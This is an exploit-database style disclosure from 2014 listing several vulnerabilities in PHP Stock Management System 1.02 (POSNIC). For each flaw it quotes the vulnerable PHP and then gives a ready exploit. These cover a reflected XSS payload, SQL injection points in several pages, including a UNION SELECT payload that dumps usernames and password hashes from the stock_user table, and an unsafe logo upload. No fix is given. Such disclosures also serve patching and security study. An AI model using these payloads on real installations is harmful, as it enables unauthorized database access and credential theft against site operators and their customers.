PHP Stock Management System 1.02 - Multiple Vulnerabilty

2014-09-09 19:05:11

# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
�# Vendor Homepage: �http://www.posnic.com/�
# Software Link:� http://sourceforge.net/projects/stockmanagement/
# Version: �1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

#########################################################################################################



XSS install.php

code :

if(isset($_REQUEST['msg'])) {

$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}


exploit :

http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E


#########################################################################################################

SQL INJECTION : stock.php

code :


include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {

if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";

}
}


exploit :


localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)


#########################################################################################################
SQL INJECTION : view_customers.php




code :

$SQL = "SELECT * FROM customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{

$SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";


}





exploit :


http://localhost/demo/POSNIC1.02DesignFix/view_customers.php

POST

searchtxt=1(inject)&Search=Search

searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################


SQL INJECTION : view_product.php

code :

if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}

$page = $_GET['page'];


if($page)

$start = ($page - 1) * $limit; //first item to display on this page

else

$start = 0; //if no page var is given, set start to 0



/* Get data. */

$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{

$sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit";


}


$result = mysql_query($sql);



exploit :

localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and

localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search




#########################################################################################################

UPLOAD : logo_set.php

code :

<?php if(isset($_POST['submit'])){

$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];






exploit :

http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################



AND MORE BUGS

Bye

#########################################################################################################


Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight

sec4ever.com & alm3refh.com

#########################################################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.